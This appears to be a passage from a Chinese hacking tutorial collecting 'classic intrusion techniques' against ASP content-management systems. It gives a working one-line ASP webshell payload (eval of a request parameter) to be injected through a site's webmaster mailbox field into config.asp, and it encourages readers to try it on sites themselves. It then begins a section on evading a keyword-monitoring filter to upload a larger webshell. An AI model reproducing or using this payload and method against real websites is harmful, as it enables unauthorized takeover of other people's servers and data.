几个用过的经典入侵技巧整理

核心提示： 图5图6图片看不清楚？请点击这里查看原图（大图），怎么样？SHELL拿到了吧，几个用过的经典入侵技巧整理(6)，这里有一点要注意，虽然SHELL是拿到了但是这个时候网站也挂掉了，请注意，不要提交任何违反国家规定的内容！本次拦截的相关信息为：98424b88afb8，我们需要进到SHELL里

图5

图6

图片看不清楚？请点击这里查看原图（大图）。

怎么样？SHELL拿到了吧，这里有一点要注意，虽然SHELL是拿到了但是这个时候网站也挂掉了，我们需要进到SHELL里找到config.asp文件，把里面的 "小新恭喜" 去掉，就OK啦。

其实不光是MY动力管理系统，动易文章系统以前也存在这个问题：在站长信箱那里写入"%><%eval(request("xiaozhi"))%><%’ 然后直接连接

inc目录下的config.asp就可以了。因为很多网站信息都是写入在config.asp里的，有空各位朋友可以自己去测试一下（编辑：如果读者朋友懂ASP可以自己研究一些ASP程序是否在后台配置文件用到FSO，这样基本上就是把配置信息写到了ASP文件里了）。

三、突破一流信息监控系统实现文件“上传”

相信很多朋友可能遇到过这样一个问题：在得到一个小马以后传大马的时候服务器却提示错误：很抱歉，由于您提交的内容中或访问的内容中含有系统不允许的关键词，本次操作无效，系统已记录您的IP及您提交的所有数据。请注意，不要提交任何违反国家规定的内容！本次拦截的相关信息为：98424b88afb8，如图7。

图7